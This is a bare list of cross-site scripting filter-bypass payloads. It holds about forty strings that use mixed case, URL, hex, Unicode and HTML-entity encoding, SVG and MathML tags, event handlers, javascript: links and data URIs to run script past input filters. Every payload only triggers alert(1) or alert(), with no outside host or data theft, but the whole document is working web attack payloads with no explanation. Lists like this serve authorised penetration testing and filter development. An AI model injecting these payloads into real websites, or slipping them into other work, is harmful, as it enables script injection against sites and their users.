# XSS - Filter Bypass Payloads
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror="alert(1)">
<img src=x onerror='alert(1)'>
<svg><script>alert(1)</script></svg>
<svg><script>alert&#40;1&#41;</script>
%3Cscript%3Ealert(1)%3C/script%3E
\x3cscript\x3ealert(1)\x3c/script\x3e
<script>alert(1)//
<SCRIPT>alert(1)</SCRIPT>
<Script>alert(1)</Script>
<script type="text/javascript">alert(1)</script>
";alert(1);"
';alert(1);'
</script><script>alert(1)</script>
<img """><script>alert(1)</script>">
<svg/onload=alert(1)>
<svg onload=alert(1)//
<math><mi//xlink:href="data:x,<script>alert(1)</script>">
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=x onerror=alert(1)&gt;">
<svg><animate onbegin=alert(1) attributeName=x>
<svg><set onbegin=alert(1) attributename=x>
<svg><discard onbegin=alert(1)>
<input onfocusin=alert(1) autofocus>
<input onpointerover=alert(1) style="position:fixed;top:0;left:0;width:100%;height:100%">
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>test</details>
<div onpointerenter=alert(1)>hover me</div>
<div onmouseleave=alert(1)>leave me</div>
<template><img src=x onerror=alert(1)></template>
<xss contenteditable onblur=alert(1) tabindex=1 id=xss>focus then blur</xss>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//
<a href="&#106;avascript:alert(1)">click</a>
<a href="&#x6A;avascript:alert(1)">click</a>
<embed src="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<img src=x onerror=alert(1)//
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=&#x61;lert(1)>
